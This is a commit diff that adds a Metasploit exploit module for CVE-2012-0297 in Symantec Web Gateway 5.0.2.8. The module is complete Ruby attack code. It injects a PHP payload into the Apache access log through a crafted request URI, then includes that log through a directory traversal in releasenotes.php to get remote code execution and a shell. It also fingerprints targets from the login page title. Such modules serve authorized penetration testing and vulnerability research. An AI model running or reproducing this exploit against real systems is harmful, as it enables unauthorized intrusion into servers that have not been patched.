Merge pull request #421 from wchen-r7/symantec_web_gateway

Add CVE-2012-0297 Symantec Web Gateway
2012-05-27 23:28:59 -07:00 · 2012-05-27 23:28:59 -07:00 · 7c1442c4b4
parent 86ba759c07 34c93d8e44
commit 7c1442c4b4
1 changed files with 103 additions and 0 deletions
--- a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb
+++ b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb
@ -0,0 +1,103 @@
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 #   http://metasploit.com/framework/
 ##
 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 	include Msf::Exploit::Remote::HttpClient
 	def initialize(info={})
 		super(update_info(info,
 			'Name'           => "Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability",
 			'Description'    => %q{
 					This module exploits a vulnerability found in Symantec Web Gateway's HTTP
 				service.  By injecting PHP code in the access log, it is possible to load it
 				with a directory traversal flaw, which allows remote code execution under the
 				context of 'apache'. Please note that it may take up to several minutes to
 				retrieve access_log, which is about the amount of time required to see a shell
 				back.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
 					'Unknown', #Discovery
 					'muts',    #PoC
 					'sinn3r'   #Metasploit
 				],
 			'References'     =>
 				[
 					['CVE', '2012-0297'],
 					['EDB', '18932'],
 					['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00']
 				],
 			'Payload'        =>
 				{
 					'BadChars' => "\x00"
 				},
 			'DefaultOptions'  =>
 				{
 					'WfsDelay' => 300,  #5 minutes
 					'DisablePayloadHandler' => 'false',
 					'ExitFunction' => "none"
 				},
 			'Platform'       => ['php'],
 			'Arch'           => ARCH_PHP,
 			'Targets'        =>
 				[
 					['Symantec Web Gateway 5.0.2.8', {}],
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Apr 1 2012",
 			'DefaultTarget'  => 0))
 	end
 	def check
 		res = send_request_raw({
 			'method' => 'GET',
 			'uri'    => '/spywall/login.php'
 		})
 		if res and res.body =~ /\<title\>Symantec Web Gateway\<\/title\>/
 			return Exploit::CheckCode::Detected
 		else
 			return Exploit::CheckCode::Safe
 		end
 	end
 	def exploit
 		peer = "#{rhost}:#{rport}"
 		php = %Q|<?php #{payload.encoded} ?>|
 		# Inject PHP to log
 		print_status("#{peer} - Injecting PHP to log...")
 		res = send_request_raw({
 			'method' => 'GET',
 			'uri'    => "/#{php}"
 		})
 		select(nil, nil, nil, 1)
 		# Use the directory traversal to load the PHP code
 		# access_log takes a long time to retrieve
 		print_status("#{peer} - Loading PHP code..")
 		send_request_raw({
 			'method' => 'GET',
 			'uri'    => '/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log'
 		})
 		print_status("#{peer} - Waiting for a session, may take some time...")
 		select(nil, nil, nil, 1)
 		handler
 	end
 end